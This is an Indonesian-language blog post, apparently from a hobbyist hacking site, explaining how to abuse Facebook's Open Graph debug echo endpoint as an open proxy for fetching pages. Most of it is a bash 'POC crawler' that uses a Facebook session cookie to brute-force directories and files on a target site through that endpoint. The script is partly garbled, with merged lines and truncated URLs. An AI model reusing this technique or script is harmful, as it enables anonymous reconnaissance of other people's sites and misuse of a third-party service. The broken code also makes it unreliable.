http://www.google.co.id/search?gcx=c&ix=...agai+proxy
http://www.google.com/search?gcx=c&ix=c1...as+a+proxy
mudah ini
kamu bisa membuka html apapun
tapi kamu tak bisa ngambil cokies, , memposting
karena ini cuma bisa di 1 halaman
ya mungkin nanti bisa di kembangin lagi, ini cuma dasar saja
langsung saja
# yang pasti kamu punya fb, mudah, login fb aja
# cek ip mu. di sini atau dimana ini jelas nya : ttp://ifconfig.me/
![[Image: 423007_2576035254024_1648639092_1745094_...0666_n.jpg]](http://a8.sphotos.ak.fbcdn.net/hphotos-ak-ash4/423007_2576035254024_1648639092_1745094_1942060666_n.jpg)
# bugs nya ada disini nih http://developers.facebook.com/tools/debug/og/echo?q
# q= parameter nya harus falid, misal http:// bisa di cek di http://www.web-code.org/coding-tools/jav...-tool.html
# jadi nya kyk gini http://developers.facebook.com/tools/deb...config.me/
liat itu source kodenya keluar
#terus source code itu di copy paste ke notepad, save as format HTML, misal fb.html
# terus buka deh dengan web browser
![[Image: 422562_2576059174622_1648639092_1745098_638208999_n.jpg]](http://a5.sphotos.ak.fbcdn.net/hphotos-ak-snc7/422562_2576059174622_1648639092_1745098_638208999_n.jpg)
![[Image: 419720_2576063254724_1648639092_1745100_...5149_n.jpg]](http://a1.sphotos.ak.fbcdn.net/hphotos-ak-ash4/419720_2576063254724_1648639092_1745100_1883105149_n.jpg)
pakai saja itu proxy nya
oh iya ini ada sedikit POC crawler nya
PHP Code:
#!/bin/bash
# Bug found by #
# IB HNC #
# Site: http://hacker-newbie.org #
function start {
for a in `cat $2`
do
AURL="https://developers.facebook.com/tools/debug/og/echo?q=http%3A%2F%2F$url%2F$a"
TMP=`curl -s "$AURL" -k -b "$3" -A "Mozilla/5.0 (X11; Linux i686; rv:6.0)Gecko/20100101 Firefox/6.0" | grep "Document returned no data"`
if [ "$TMP" = "" ]; then
echo "$urlclear/$a -> 200"
else
echo "$urlclear/$a -> 404"
fi
done
echo "[*] Job done"}
if [ "$#" -lt 3 ]; then
echo "Usage: $0 <hostname> <dictonary> <facebook cookie, no space>"
echo "Example: $0 site.com /home/user/dict.txt 'datr=xxxx;c_user=999999999999;xs=66%3AXXXXXXXXXXXXX;' "
echo ""
exit 0
fi
echo "Directory and File check on " $1
match1=/repl1=%2F
match2=:repl2=%3A
url=$1
urlclear=$1
url=${url//$match1/$repl1}url=${url//$match2/$repl2}
echo ""echo "CTRL+C to stop"echo ""
start url $2 $3 urlclear
sebener nya
0 komentar:
Posting Komentar
silahkan berkomentar yang membangun dan tidak bicara yang tidak baik
terima kasih